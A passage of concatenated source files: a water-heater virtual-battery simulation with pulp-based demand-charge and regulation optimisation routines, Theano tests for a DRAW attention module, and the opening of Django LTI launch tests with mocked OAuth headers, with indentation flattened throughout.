twat[i*24*60+j]= (tout_avg+6)+ratio*(tout_madif/ 2) * sin((0.986 * (i - 15 - lag) - 90)/180*3.14)
twat=(twat-32.)/9.*5.
return twat
def prepare_pare_for_calculate_twat(self,tou_raw):
tout_avg = sum(tou_raw)/len(tou_raw)
mon=[31,28,31,30,31,30,31,31,30,31,30,31]
mon_ave=1*np.ones((12,1))
mon_ave[1]=sum(tou_raw[0:mon[1]*24])/mon[1]/24
stop=mon[1]*24
for idx in range(1,len(mon)):
mon_ave[idx]=sum(tou_raw[stop:stop+mon[idx]*24])/mon[idx]/24;
tou_madif=max(mon_ave)- min(mon_ave)
return tout_avg, tou_madif
def generate(self):
# theta_a is the ambient temperature
# theta_a = (72-32)*5.0/9*np.ones((365, 24*60)) # This is a hard-coded 72degF, converted to degCel
theta_a = self.ambient#*np.ones((365, 24*60)) # theta_a == ambient temperature
#nRow, nCol = theta_a.shape
nRow, nCol = 365, 24*60
theta_a = np.reshape(theta_a, [nRow*nCol, 1])
Tout1min= np.zeros((size(theta_a)));
for i in range(len(self.Tout)):
theta_a[i]= (self.Tout[i]+self.ambient[i])/2; # CHANGED THIS
# h is the model time discretization step in seconds
h = 60
#T is the number of time step considered, i.e., T = 365*24*60 means a year
# with 1 minute time discretization
T = len(theta_a)
tou_avg,maxdiff=self.prepare_pare_for_calculate_twat(self.Tout)
twat=self.calculate_twat(tou_avg,maxdiff);
# print twat
# theta_lower is the temperature lower bound
theta_lower_wh = self.theta_s_wh - self.delta_wh/2.0
# theta_upper is the temperature upper bound
theta_upper_wh = self.theta_s_wh + self.delta_wh/2.0
# m_water is the water draw in unit of gallon per minute
m_water = self.water#np.genfromtxt("Flow_raw_1minute_BPA.csv", delimiter=',')[1:, 1:]
where_are_NaNs = isnan(m_water)
m_water[where_are_NaNs] = 0
m_water = m_water *0.00378541178*1000/h
m_water_row, m_water_col = m_water.shape
water_draw = np.zeros((m_water_row, int(self.N_wh)))
for i in range(int(self.N_wh)):
k = np.random.randint(m_water_col)
water_draw[:, i] = np.roll(m_water[:, k], (1, np.random.randint(-14, 1))) + m_water[:, k] * 0.1 * (np.random.random() - 0.5)
# k = m_water_col - 1
# print(k)
# raise(ArgumentError, "Stop here")
# water_draw[:, i] = m_water[:, k]
first = -(
np.matmul(theta_a, np.ones((1, self.N_wh)))
- np.matmul(np.ones((T, 1)), self.theta_s_wh.transpose())
)
# print(np.argwhere(np.isnan(first)))
second = np.matmul(np.ones((T, 1)), self.R_wh.transpose())
# print(np.argwhere(np.isnan(second)))
Po = (
first
/ second
- 4.2
* np.multiply(water_draw, (55-32) * 5/9.0 - np.matmul(np.ones((T, 1)), self.theta_s_wh.transpose()))
)
# print(water_draw.shape)
# print(len(water_draw[:1]))
# Po_total is the analytically predicted aggregate baseline power
Po_total = np.sum(Po, axis=1)
upper_limit = np.sum(self.P_wh, axis=0)
# print(np.argwhere(np.isnan(water_draw)))
Po_total[Po_total > upper_limit[0]] = upper_limit
# theta is the temperature of TCLs
theta = np.zeros((self.N_wh, T))
theta[:, 0] = self.theta_s_wh.reshape(-1)
# m is the indicator of on-off state: 1 is on, 0 is off
m = np.ones((self.N_wh, T))
m[:int(self.N_wh*0.8), 0] = 0
for t in range(T - 1):
theta[:, t+1] = (
(1 - h/(self.C_wh * 3600) / self.R_wh).reshape(-1)
* theta[:, t]
+ (h / (self.C_wh * 3600) / self.R_wh).reshape(-1)
* theta_a[t]
+ ((h/(self.C_wh * 3600))*self.P_wh).reshape(-1)*m[:, t]
)
m[theta[:, t+1] > (theta_upper_wh).reshape(-1), t+1] = 0
m[theta[:, t+1] < (theta_lower_wh).reshape(-1), t+1] = 1
m[(theta[:, t+1] >= (theta_lower_wh).reshape(-1)) & (theta[:, t+1] <= (theta_upper_wh).reshape(-1)), t+1] = m[(theta[:, t+1] >= (theta_lower_wh).reshape(-1)) & (theta[:, t+1] <= (theta_upper_wh).reshape(-1)), t]
theta[:, 0] = theta[:, -1]
m[:, 0] = m[:, -1]
# Po_total_sim is the predicted aggregate baseline power using simulations
Po_total_sim = np.zeros((T, 1))
Po_total_sim[0] = np.sum(m[:, 0]*(self.P_wh.reshape(-1)))
for t in range(T - 1):
# print t
theta[:, t+1] = (1 - h/(self.C_wh * 3600)/self.R_wh).reshape(-1) * theta[:, t] + (h/(self.C_wh * 3600)/self.R_wh).reshape(-1)*theta_a[t] + (h/(self.C_wh*3600)).reshape(-1)*m[:, t]*self.P_wh.reshape(-1) + h*4.2*water_draw[t, :].transpose() * (twat[t] -theta[:, t]) / ((self.C_wh*3600).reshape(-1))
m[theta[:, t+1] > (theta_upper_wh).reshape(-1), t+1] = 0
m[theta[:, t+1] < (theta_lower_wh).reshape(-1), t+1] = 1
m[(theta[:, t+1] >= (theta_lower_wh).reshape(-1)) & (theta[:, t+1] <= (theta_upper_wh).reshape(-1)), t+1] = m[(theta[:, t+1] >= (theta_lower_wh).reshape(-1)) & (theta[:, t+1] <= (theta_upper_wh).reshape(-1)), t]
Po_total_sim[t+1] = np.sum(m[:, t+1] * self.P_wh.reshape(-1))
index_available = np.ones((self.N_wh, T))
for t in range(T - 1):
index_available[(theta[:, t] < (theta_lower_wh-0.5).reshape(-1)) | (theta[:, t] > (theta_upper_wh+0.5).reshape(-1)), t] = 0
# Virtual battery parameters
p_upper_wh1 = np.sum(self.P_wh) - Po_total_sim
p_lower_wh1 = Po_total_sim
e_ul_wh1 = np.sum((np.matmul(self.C_wh, np.ones((1, T))) * np.matmul(self.delta_wh, np.ones((1, T))) / 2 * index_available).transpose(), axis=1)
# calculate hourly average data from minute output for power
p_upper_wh1 = np.reshape(p_upper_wh1, [8760,60])
p_upper_wh = np.mean(p_upper_wh1, axis=1)*float(self.N)/float(self.N_wh)
p_lower_wh1 = np.reshape(p_lower_wh1, [8760,60])
p_lower_wh = np.mean(p_lower_wh1, axis=1)*float(self.N)/float(self.N_wh)
# extract hourly data from minute output for energy
e_ul_wh = e_ul_wh1[59:len(e_ul_wh1):60]*float(self.N)/float(self.N_wh)
return p_lower_wh, p_upper_wh, e_ul_wh
# ------------------------STACKED CODE FROM PNNL----------------------------- #
def run_fhec(ind, gt_demand, Input):
use_hour = int(ind["userHourLimit"]) # number of VB use hours specified by the user
epsilon = 1 #float(ind["energyReserve"]) # energy reserve parameter, range: 0 - 1
fhec_kwh_rate = float(ind["electricityCost"]) # $/kW
fhec_peak_mult = float(ind["peakMultiplier"])
s = sorted(gt_demand)
# peak hours calculation
perc = float(ind["peakPercentile"])
fhec_gt98 = s[int(perc*len(s))]
fhec_peak_hours = []
for idx, val in enumerate(gt_demand):
if val > fhec_gt98:
fhec_peak_hours.extend([idx+1])
fhec_off_peak_hours = []
for i in range(len(gt_demand)):
if i not in fhec_peak_hours:
fhec_off_peak_hours.extend([i+1])
# read the input data, including load profile, VB profile, and regulation price
# Input = pd.read_csv(input_csv, index_col=['Hour'])
# VB model parameters
C = float(ind["capacitance"]) # thermal capacitance
R = float(ind["resistance"]) # thermal resistance
deltaT = 1
alpha = math.exp(-deltaT/(C*R)) # hourly self discharge rate
E_0 = 0 # VB initial energy state
arbitrage_option = ind["use_arbitrage"] == "on"
regulation_option = ind["use_regulation"] == "on"
deferral_option = ind["use_deferral"] == "on"
# calculate the predicted profits for all 8760 hours
use_prft = []
for hour in Input.index:
temp = 0
if arbitrage_option or deferral_option:
if hour in fhec_peak_hours:
temp += fhec_peak_mult*fhec_kwh_rate*(Input.loc[hour, "VB Energy upper (kWh)"]-Input.loc[hour, "VB Energy lower (kWh)"])
if hour in fhec_off_peak_hours:
temp += fhec_kwh_rate*(Input.loc[hour, "VB Energy upper (kWh)"]-Input.loc[hour, "VB Energy lower (kWh)"])
if regulation_option:
temp += (Input.loc[hour, "Reg-up Price ($/MW)"]+Input.loc[hour, "Reg-dn Price ($/MW)"])/1000*(Input.loc[hour, "VB Energy upper (kWh)"]-Input.loc[hour, "VB Energy lower (kWh)"])
use_prft.append({'Hour': hour, 'Profit': temp})
# sort the predicted profits from the highest to the lowest
use_prft = sorted(use_prft, reverse = True, key = lambda i : i['Profit'])
# get the indices of the first use_hour hours, and the optimization will be scheduled only for those hours
use_list = []
for index in range(use_hour):
use_list.append(use_prft[index]['Hour'])
###############################################################################
# start demand charge reduction LP problem
model = pulp.LpProblem("Demand charge minimization problem FHEC-Knievel", pulp.LpMinimize)
# decision variable of VB charging power; dim: 8760 by 1
VBpower = pulp.LpVariable.dicts("ChargingPower", ((hour) for hour in Input.index))
# set bound
for hour in Input.index:
if hour in use_list:
VBpower[hour].lowBound = Input.loc[hour, "VB Power lower (kW)"]
VBpower[hour].upBound = Input.loc[hour, "VB Power upper (kW)"]
if hour not in use_list:
VBpower[hour].lowBound = 0
VBpower[hour].upBound = 0
# decision variable of VB energy state; dim: 8760 by 1
VBenergy = pulp.LpVariable.dicts("EnergyState", ((hour) for hour in Input.index))
# set bound
for hour in Input.index:
VBenergy[hour].lowBound = Input.loc[hour, "VB Energy lower (kWh)"]
VBenergy[hour].upBound = Input.loc[hour, "VB Energy upper (kWh)"]
# decision variable of annual peak demand
PeakDemand = pulp.LpVariable("annual peak demand", lowBound=0)
# decision variable: hourly regulation up capacity; dim: 8760 by 1
reg_up = pulp.LpVariable.dicts("hour reg up", ((hour) for hour in Input.index), lowBound=0)
# decision variable: hourly regulation dn capacity; dim: 8760 by 1
reg_dn = pulp.LpVariable.dicts("hour reg dn", ((hour) for hour in Input.index), lowBound=0)
for hour in Input.index:
if hour not in use_list:
reg_up[hour].upBound = 0
reg_dn[hour].upBound = 0
# objective functions
if (arbitrage_option == False and regulation_option == False and deferral_option == False):
model += 0, "an arbitrary objective function"
if (arbitrage_option == True and regulation_option == False and deferral_option == False):
model += pulp.lpSum([fhec_peak_mult*fhec_kwh_rate*(Input.loc[hour, "Load (kW)"]+VBpower[hour]) for hour in fhec_peak_hours]
+ [fhec_kwh_rate*(Input.loc[hour, "Load (kW)"]+VBpower[hour]) for hour in fhec_off_peak_hours])
if (arbitrage_option == False and regulation_option == True and deferral_option == False):
model += pulp.lpSum([-Input.loc[hour, "Reg-up Price ($/MW)"]/1000*reg_up[hour] for hour in Input.index]
+ [-Input.loc[hour, "Reg-dn Price ($/MW)"]/1000*reg_dn[hour] for hour in Input.index])
if (arbitrage_option == False and regulation_option == False and deferral_option == True):
model += pulp.lpSum(1E03*PeakDemand)
if (arbitrage_option == True and regulation_option == True and deferral_option == False):
model += pulp.lpSum([fhec_peak_mult*fhec_kwh_rate*(Input.loc[hour, "Load (kW)"]+VBpower[hour]) for hour in fhec_peak_hours]
+ [fhec_kwh_rate*(Input.loc[hour, "Load (kW)"]+VBpower[hour]) for hour in fhec_off_peak_hours]
+ [-Input.loc[hour, "Reg-up Price ($/MW)"]/1000*reg_up[hour] for hour in Input.index]
+ [-Input.loc[hour, "Reg-dn Price ($/MW)"]/1000*reg_dn[hour] for hour in Input.index])
if (arbitrage_option == True and regulation_option == False and deferral_option == True):
model += pulp.lpSum([fhec_peak_mult*fhec_kwh_rate*(Input.loc[hour, "Load (kW)"]+VBpower[hour]) for hour in fhec_peak_hours]
+ [fhec_kwh_rate*(Input.loc[hour, "Load (kW)"]+VBpower[hour]) for hour in fhec_off_peak_hours]
+ 1E03*PeakDemand)
if (arbitrage_option == False and regulation_option == True and deferral_option == True):
model += pulp.lpSum([-Input.loc[hour, "Reg-up Price ($/MW)"]/1000*reg_up[hour] for hour in Input.index]
+ [-Input.loc[hour, "Reg-dn Price ($/MW)"]/1000*reg_dn[hour] for hour in Input.index]
+ 1E03*PeakDemand)
if (arbitrage_option == True and regulation_option == True and deferral_option == True):
model += pulp.lpSum([fhec_peak_mult*fhec_kwh_rate*(Input.loc[hour, "Load (kW)"]+VBpower[hour]) for hour in fhec_peak_hours]
+ [fhec_kwh_rate*(Input.loc[hour, "Load (kW)"]+VBpower[hour]) for hour in fhec_off_peak_hours]
+ [-Input.loc[hour, "Reg-up Price ($/MW)"]/1000*reg_up[hour] for hour in Input.index]
+ [-Input.loc[hour, "Reg-dn Price ($/MW)"]/1000*reg_dn[hour] for hour in Input.index]
+ 1E03*PeakDemand)
# VB energy state as a function of VB power
for hour in Input.index:
if hour==1:
model += VBenergy[hour] == alpha*E_0 + VBpower[hour]*deltaT
else:
model += VBenergy[hour] == alpha*VBenergy[hour-1] + VBpower[hour]*deltaT
# hourly regulation constraints
for hour in Input.index:
if regulation_option:
model += reg_up[hour] == reg_dn[hour] # regulation balance
model += VBenergy[hour] - epsilon*reg_up[hour]*deltaT >= VBenergy[hour].lowBound
model += VBenergy[hour] + epsilon*reg_dn[hour]*deltaT <= VBenergy[hour].upBound
else:
model += reg_up[hour] == 0
model += reg_dn[hour] == 0
# extra constraints
for hour in Input.index:
model += PeakDemand >= Input.loc[hour, "Load (kW)"] + VBpower[hour]
model.solve()
###############################################################################
use_hour_indicator = []
for hour in Input.index:
if VBpower[hour].varValue != 0 or reg_up[hour].varValue != 0:
use_hour_indicator.append({'Hour': hour, 'Use': 1})
else:
use_hour_indicator.append({'Hour': hour, 'Use': 0})
output = []
for hour in Input.index:
var_output = {
'Hour': hour,
'VB energy (kWh)': int(100*VBenergy[hour].varValue)/100,
'VB power (kW)': int(100*VBpower[hour].varValue)/100,
'Load (kW)': int(100*Input.loc[hour, "Load (kW)"])/100,
'Net load (kW)': int(100*(VBpower[hour].varValue+Input.loc[hour, "Load (kW)"]))/100,
'Hour used': use_hour_indicator[hour-1]['Use']
}
if regulation_option:
var_regulation = {'Regulation (kW)': int(100*reg_up[hour].varValue)/100}
var_output.update(var_regulation)
output.append(var_output)
output_df = pd.DataFrame.from_records(output)
# output_df.to_csv('fhec_output.csv', index=False)
return output_df
def run_okec(ind, Input):
# Input.to_csv('okec_input.csv', index=False)
use_hour = int(ind["userHourLimit"]) # number of VB use hours specified by the user
epsilon = 1 #float(ind["energyReserve"]) # energy reserve parameter, range: 0 - 1
okec_peak_charge = float(ind["annual_peak_charge"]) # annual peak demand charge $100/kW
okec_avg_demand_charge = float(ind["avg_demand_charge"]) # $120/kW
okec_fuel_charge = float(ind["fuel_charge"]) # total energy $/kWh
# VB model parameters
C = float(ind["capacitance"]) # thermal capacitance
R = float(ind["resistance"]) # thermal resistance
deltaT = 1
alpha = math.exp(-deltaT/(C*R)) # hourly self discharge rate
E_0 = 0 # VB initial energy state
arbitrage_option = ind["use_arbitrage"] == "on"
regulation_option = ind["use_regulation"] == "on"
deferral_option = ind["use_deferral"] == "on"
# calculate the predicted profits for all 8760 hours
use_prft = []
for hour in Input.index:
temp = 0
if arbitrage_option or deferral_option:
temp += okec_avg_demand_charge/len(Input.index)*(Input.loc[hour, "VB Energy upper (kWh)"]-Input.loc[hour, "VB Energy lower (kWh)"])
if regulation_option:
temp += (Input.loc[hour, "Reg-up Price ($/MW)"]+Input.loc[hour, "Reg-dn Price ($/MW)"])/1000*(Input.loc[hour, "VB Energy upper (kWh)"]-Input.loc[hour, "VB Energy lower (kWh)"])
use_prft.append({'Hour': hour, 'Profit': temp})
# sort the predicted profits from the highest to the lowest
use_prft = sorted(use_prft, reverse = True, key = lambda i : i['Profit'])
# get the indices of the first use_hour hours, and the optimization will be scheduled only for those hours
use_list = []
for index in range(use_hour):
use_list.append(use_prft[index]['Hour'])
# start demand charge reduction LP problem
model = pulp.LpProblem("Demand charge minimization problem OKEC-Buffett", pulp.LpMinimize)
# decision variable of VB charging power; dim: 8760 by 1
VBpower = pulp.LpVariable.dicts("ChargingPower", ((hour) for hour in Input.index))
# set bound
for hour in Input.index:
if hour in use_list:
VBpower[hour].lowBound = Input.loc[hour, "VB Power lower (kW)"]
VBpower[hour].upBound = Input.loc[hour, "VB Power upper (kW)"]
if hour not in use_list:
VBpower[hour].lowBound = 0
VBpower[hour].upBound = 0
# decision variable of VB energy state; dim: 8760 by 1
VBenergy = pulp.LpVariable.dicts("EnergyState", ((hour) for hour in Input.index))
# set bound
for hour in Input.index:
VBenergy[hour].lowBound = Input.loc[hour, "VB Energy lower (kWh)"]
VBenergy[hour].upBound = Input.loc[hour, "VB Energy upper (kWh)"]
# decision variable of annual peak demand
PeakDemand = pulp.LpVariable("annual peak demand", lowBound=0)
# decision variable: hourly regulation up capacity; dim: 8760 by 1
reg_up = pulp.LpVariable.dicts("hour reg up", ((hour) for hour in Input.index), lowBound=0)
# decision variable: hourly regulation dn capacity; dim: 8760 by 1
reg_dn = pulp.LpVariable.dicts("hour reg dn", ((hour) for hour in Input.index), lowBound=0)
for hour in Input.index:
if hour not in use_list:
reg_up[hour].upBound = 0
reg_dn[hour].upBound = 0
# objective function: sum of monthly demand charge
if (arbitrage_option == False and regulation_option == False and deferral_option == False):
model += 0, "an arbitrary objective function"
if (arbitrage_option == True and regulation_option == False and deferral_option == False):
model += pulp.lpSum(okec_peak_charge*PeakDemand
+ [okec_avg_demand_charge*(Input.loc[hour, "Load (kW)"]+VBpower[hour])/len(Input.index) for hour in Input.index]
+ [okec_fuel_charge*(Input.loc[hour, "Load (kW)"]+VBpower[hour])*deltaT for hour in Input.index])
if (arbitrage_option == False and regulation_option == True and deferral_option == False):
model += pulp.lpSum([-Input.loc[hour, "Reg-up Price ($/MW)"]/1000*reg_up[hour] for hour in Input.index]
+ [-Input.loc[hour, "Reg-dn Price ($/MW)"]/1000*reg_dn[hour] for hour in Input.index])
if (arbitrage_option == False and regulation_option == False and deferral_option == True):
model += pulp.lpSum(1E03*PeakDemand)
if (arbitrage_option == True and regulation_option == True and deferral_option == False):
model += pulp.lpSum(okec_peak_charge*PeakDemand
+ [okec_avg_demand_charge*(Input.loc[hour, "Load (kW)"]+VBpower[hour])/len(Input.index) for hour in Input.index]
+ [okec_fuel_charge*(Input.loc[hour, "Load (kW)"]+VBpower[hour])*deltaT for hour in Input.index]
+ [-Input.loc[hour, "Reg-up Price ($/MW)"]/1000*reg_up[hour] for hour in Input.index]
+ [-Input.loc[hour, "Reg-dn Price ($/MW)"]/1000*reg_dn[hour] for hour in Input.index])
if (arbitrage_option == True and regulation_option == False and deferral_option == True):
model += pulp.lpSum(okec_peak_charge*PeakDemand
+ [okec_avg_demand_charge*(Input.loc[hour, "Load (kW)"]+VBpower[hour])/len(Input.index) for hour in Input.index]
+ [okec_fuel_charge*(Input.loc[hour, "Load (kW)"]+VBpower[hour])*deltaT for hour in Input.index]
+ 1E03*PeakDemand)
if (arbitrage_option == False and regulation_option == True and deferral_option == True):
model += pulp.lpSum([-Input.loc[hour, "Reg-up Price ($/MW)"]/1000*reg_up[hour] for hour in Input.index]
+ [-Input.loc[hour, "Reg-dn Price ($/MW)"]/1000*reg_dn[hour] for hour in Input.index]
+ 1E03*PeakDemand)
if (arbitrage_option == True and regulation_option == True and deferral_option == True):
model += pulp.lpSum(okec_peak_charge*PeakDemand
+ [okec_avg_demand_charge*(Input.loc[hour, "Load (kW)"]+VBpower[hour])/len(Input.index) for hour in Input.index]
+ [okec_fuel_charge*(Input.loc[hour, "Load (kW)"]+VBpower[hour])*deltaT for hour in Input.index]
+ [-Input.loc[hour, "Reg-up Price ($/MW)"]/1000*reg_up[hour] for hour in Input.index]
+ [-Input.loc[hour, "Reg-dn Price ($/MW)"]/1000*reg_dn[hour] for hour in Input.index]
+ 1E03*PeakDemand)
# VB energy state as a function of VB power
for hour in Input.index:
if hour==1:
model += VBenergy[hour] == alpha*E_0 + VBpower[hour]*deltaT
else:
model += VBenergy[hour] == alpha*VBenergy[hour-1] + VBpower[hour]*deltaT
# hourly regulation constraints
for hour in Input.index:
if regulation_option:
model += reg_up[hour] == reg_dn[hour] # regulation balance
model += VBenergy[hour] - epsilon*reg_up[hour]*deltaT >= VBenergy[hour].lowBound
model += VBenergy[hour] + epsilon*reg_dn[hour]*deltaT <= VBenergy[hour].upBound
else:
model += reg_up[hour] == 0
model += reg_dn[hour] == 0
# extra constraints
for hour in Input.index:
model += PeakDemand >= Input.loc[hour, "Load (kW)"] + VBpower[hour]
model.solve()
###############################################################################
use_hour_indicator = []
for hour in Input.index:
if VBpower[hour].varValue != 0 or reg_up[hour].varValue != 0:
use_hour_indicator.append({'Hour': hour, 'Use': 1})
else:
use_hour_indicator.append({'Hour': hour, 'Use': 0})
output = []
for hour in Input.index:
var_output = {
'Hour': hour,
'VB energy (kWh)': int(100*VBenergy[hour].varValue)/100,
'VB power (kW)': int(100*VBpower[hour].varValue)/100,
'Load (kW)': int(100*Input.loc[hour, "Load (kW)"])/100,
'Net load (kW)': int(100*(VBpower[hour].varValue+Input.loc[hour, "Load (kW)"]))/100,
'Hour used': use_hour_indicator[hour-1]['Use']
}
if regulation_option:
var_regulation = {'Regulation (kW)': int(100*reg_up[hour].varValue)/100}
var_output.update(var_regulation)
output.append(var_output)
output_df = pd.DataFrame.from_records(output)
return output_df
| gpl-2.0 |
ablavatski/draw | tests/test_attention.py | 7 | 4359 |
import unittest
import theano
import numpy as np
from theano import tensor as T
from draw.attention import *
floatX = theano.config.floatX
def test_batched_dot():
a = T.ftensor3('a')
b = T.ftensor3('b')
c = my_batched_dot(a, b)
# Test in with values
dim1, dim2, dim3, dim4 = 10, 12, 15, 20
A_shape = (dim1, dim2, dim3)
B_shape = (dim1, dim3, dim4)
C_shape = (dim1, dim2, dim4)
A = np.arange(np.prod(A_shape)).reshape(A_shape).astype(floatX)
B = np.arange(np.prod(B_shape)).reshape(B_shape).astype(floatX)
C = c.eval({a: A, b: B})
# check shape
assert C.shape == C_shape
# check content
C_ = np.zeros((dim1, dim2, dim4))
for i in range(dim1):
C_[i] = np.dot(A[i], B[i])
assert np.allclose(C, C_)
class TestZoomableAttentionWindow:
def setUp(self):
# Device under test
self.channels = 1
self.height = 50
self.width = 120
self.N = 100
self.zaw = ZoomableAttentionWindow(self.channels, self.height, self.width, self.N)
def test_filterbank_matrices(self):
batch_size = 100
height, width = self.height, self.width
N = self.N
zaw = self.zaw
# Create theano function
center_y, center_x = T.fvectors('center_x', 'center_y')
delta, sigma = T.fvectors('delta', 'sigma')
FY, FX = zaw.filterbank_matrices(center_y, center_x, delta, sigma)
do_filterbank = theano.function(
[center_y, center_x, delta, sigma],
[FY, FX],
name="do_filterbank_matrices",
allow_input_downcast=True)
# test theano function
center_y = np.linspace(-height, 2*height, batch_size)
center_x = np.linspace(-width, 2*width, batch_size)
delta = np.linspace(0.1, height, batch_size)
sigma = np.linspace(0.1, height, batch_size)
FY, FX = do_filterbank(center_y, center_x, delta, sigma)
assert FY.shape == (batch_size, N, height)
assert FX.shape == (batch_size, N, width)
assert np.isfinite(FY).all()
assert np.isfinite(FX).all()
def test_read(self):
batch_size = 100
height, width = self.height, self.width
N = self.N
zaw = self.zaw
# Create theano function
images = T.ftensor3('images')
center_y, center_x = T.fvectors('center_x', 'center_y')
delta, sigma = T.fvectors('delta', 'sigma')
readout = zaw.read(images, center_y, center_x, delta, sigma)
do_read = theano.function(
[images, center_y, center_x, delta, sigma],
readout,
name="do_read",
allow_input_downcast=True)
# Test theano function
images = np.random.uniform(size=(batch_size, height, width))
center_y = np.linspace(-height, 2*height, batch_size)
center_x = np.linspace(-width, 2*width, batch_size)
delta = np.linspace(0.1, height, batch_size)
sigma = np.linspace(0.1, height, batch_size)
readout = do_read(images, center_y, center_x, delta, sigma)
assert readout.shape == (batch_size, N**2)
assert np.isfinite(readout).all()
assert (readout >= 0.).all()
assert (readout <= 1.).all()
def test_write(self):
batch_size = 100
height, width = self.height, self.width
N = self.N
zaw = self.zaw
# Create theano function
content = T.fmatrix('content')
center_y, center_x = T.fvectors('center_x', 'center_y')
delta, sigma = T.fvectors('delta', 'sigma')
images = zaw.write(content, center_y, center_x, delta, sigma)
do_write = theano.function(
[content, center_y, center_x, delta, sigma],
images,
name="do_write",
allow_input_downcast=True)
# Test theano function
content = np.random.uniform(size=(batch_size, N**2))
center_y = np.linspace(-height, 2*height, batch_size)
center_x = np.linspace(-width, 2*width, batch_size)
delta = np.linspace(0.1, height, batch_size)
sigma = np.linspace(0.1, height, batch_size)
images = do_write(content, center_y, center_x, delta, sigma)
assert images.shape == (batch_size, height*width)
assert np.isfinite(images).all()
| mit |
raccoongang/socraticqs2 | mysite/lti/tests.py | 1 | 21256 | # coding=utf-8
import json
import oauth2
from datetime import date, timedelta
import unittest
from mock import patch, Mock
from ddt import ddt, data, unpack
from django.utils import timezone
from django.test import TestCase, Client
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from accounts.models import Profile, Instructor
from psa.models import UserSocialAuth
from ct.models import Course, Role, Unit, CourseUnit, UnitLesson, Lesson
from lti.models import LTIUser, CourseRef, LtiConsumer
from lti.views import create_courseref
class LTITestCase(TestCase):
def setUp(self):
"""
Preconditions.
"""
from chat.fsm_plugin.chat import get_specs
from chat.fsm_plugin.additional import get_specs as get_specs_additional
self.client = Client()
self.user = User.objects.create_user('test', '[email protected]', 'test')
get_specs()[0].save_graph(self.user.username)
get_specs_additional()[0].save_graph(self.user.username)
mocked_nonce = u'135685044251684026041377608307'
mocked_timestamp = u'1234567890'
mocked_decoded_signature = u'my_signature='
self.headers = {
u'user_id': 1,
u'lis_person_name_full': u'Test Username',
u'lis_person_name_given': u'First',
u'lis_person_name_family': u'Second',
u'lis_person_contact_email_primary': u'[email protected]',
u'lis_person_sourcedid': u'Test_Username',
u'oauth_callback': u'about:blank',
u'launch_presentation_return_url': '',
u'lti_message_type': u'basic-lti-launch-request',
u'lti_version': 'LTI-1p0',
u'roles': u'Student',
u'context_id': 1,
u'tool_consumer_info_product_family_code': u'moodle',
u'context_title': u'Test title',
u'tool_consumer_instance_guid': u'test.dot.com',
u'resource_link_id': 'dfgsfhrybvrth',
u'lis_result_sourcedid': 'wesgaegagrreg',
u'oauth_nonce': mocked_nonce,
u'oauth_timestamp': mocked_timestamp,
u'oauth_consumer_key': u'consumer_key',
u'oauth_signature_method': u'HMAC-SHA1',
u'oauth_version': u'1.0',
u'oauth_signature': mocked_decoded_signature
}
self.unit = Unit(title='Test title', addedBy=self.user)
self.unit.save()
self.course = Course(title='Test title',
description='test description',
access='Public',
enrollCode='111',
lockout='222',
addedBy=self.user)
self.course.save()
self.course_ref = CourseRef(
course=self.course, context_id=self.headers.get('context_id'),
tc_guid=self.headers.get('tool_consumer_instance_guid')
)
self.course_ref.save()
self.course_ref.instructors.add(self.user)
self.role1 = Role(
role=Role.ENROLLED,
user=self.user,
course=self.course,
)
self.role1.save()
self.courseunit = CourseUnit(
unit=self.unit, course=self.course,
order=0, addedBy=self.user, releaseTime=timezone.now()
)
self.courseunit.save()
lesson = Lesson(title='title', text='text', addedBy=self.user)
lesson.save()
unitlesson = UnitLesson(
unit=self.unit, order=0, lesson=lesson, addedBy=self.user, treeID=lesson.id
)
unitlesson.save()
self.lti_consumer = LtiConsumer(
consumer_name='test',
consumer_key='consumer_key',
consumer_secret='test_key'
)
self.lti_consumer.save()
@patch('lti.views.DjangoToolProvider')
class MethodsTest(LTITestCase):
"""
Test for correct request method passed in view.
"""
@patch('lti.views.waffle.switch_is_active', return_value=False)
def test_post(self, switch, mocked):
mocked.return_value.is_valid_request.return_value = True
response = self.client.post('/lti/', data=self.headers, follow=True)
self.assertTemplateUsed(response, template_name='ct/course.html')
switch.return_value = True
response = self.client.post(
'/lti/',
data=self.headers,
follow=True
)
self.assertTemplateUsed(response, template_name='lms/course_page.html')
def test_failure_post(self, mocked):
mocked.return_value.is_valid_request.return_value = False
response = self.client.post('/lti/', data=self.headers, follow=True)
self.assertTemplateUsed(response, template_name='lti/error.html')
def test_get(self, mocked):
mocked.return_value.is_valid_request.return_value = True
response = self.client.get('/lti/', follow=True)
self.assertTemplateUsed(response, template_name='lti/error.html')
@ddt
@patch('lti.views.DjangoToolProvider')
class ParamsTest(LTITestCase):
"""
Test different params handling.
"""
@unpack
@data((Role.INSTRUCTOR, {u'roles': u'Instructor'}),
(Role.ENROLLED, {u'roles': u'Learner'}))
def test_roles(self, role, header, mocked):
self.headers.update(header)
mocked.return_value.is_valid_request.return_value = True
self.client.post('/lti/',
data=self.headers,
follow=True)
self.assertTrue(Role.objects.filter(role=role).exists())
def test_user_id(self, mocked):
del self.headers[u'user_id']
mocked.return_value.is_valid_request.return_value = True
response = self.client.post('/lti/',
data=self.headers,
follow=True)
self.assertTemplateUsed(response, template_name='lti/error.html')
def test_roles_none(self, mocked):
del self.headers[u'roles']
mocked.return_value.is_valid_request.return_value = True
self.client.post('/lti/', data=self.headers, follow=True)
self.assertTrue(Role.objects.filter(role=Role.ENROLLED).exists())
def test_lti_user(self, mocked):
"""
Default LTI user creation process.
"""
mocked.return_value.is_valid_request.return_value = True
self.client.post('/lti/', data=self.headers, follow=True)
self.assertTrue(LTIUser.objects.filter(lti_consumer=self.lti_consumer).exists())
self.assertTrue(Role.objects.filter(role=Role.ENROLLED).exists())
self.assertEqual(LTIUser.objects.get(lti_consumer=self.lti_consumer).django_user,
self.user)
def test_lti_users_same_full_name(self, mocked):
"""
Test user creation w/ the same `lis_person_name_full`.
"""
mocked.return_value.is_valid_request.return_value = True
# Link LtiUser to Django user by email
self.client.post('/lti/', data=self.headers, follow=True)
self.assertEqual(
self.user, LTIUser.objects.get(lti_consumer=self.lti_consumer).django_user
)
# Create new Django user
self.headers[u'user_id'] = 2
self.headers[u'lis_person_contact_email_primary'] = '[email protected]'
self.client.post('/lti/', data=self.headers, follow=True)
self.assertNotEqual(self.user, UserSocialAuth.objects.get(
uid=self.headers[u'lis_person_contact_email_primary']
).user)
first_user = UserSocialAuth.objects.get(
uid=self.headers[u'lis_person_contact_email_primary']
).user
# Create another Django user
self.headers[u'user_id'] = 3
self.headers[u'lis_person_contact_email_primary'] = '[email protected]'
self.client.post('/lti/', data=self.headers, follow=True)
self.assertNotEqual(first_user, UserSocialAuth.objects.get(
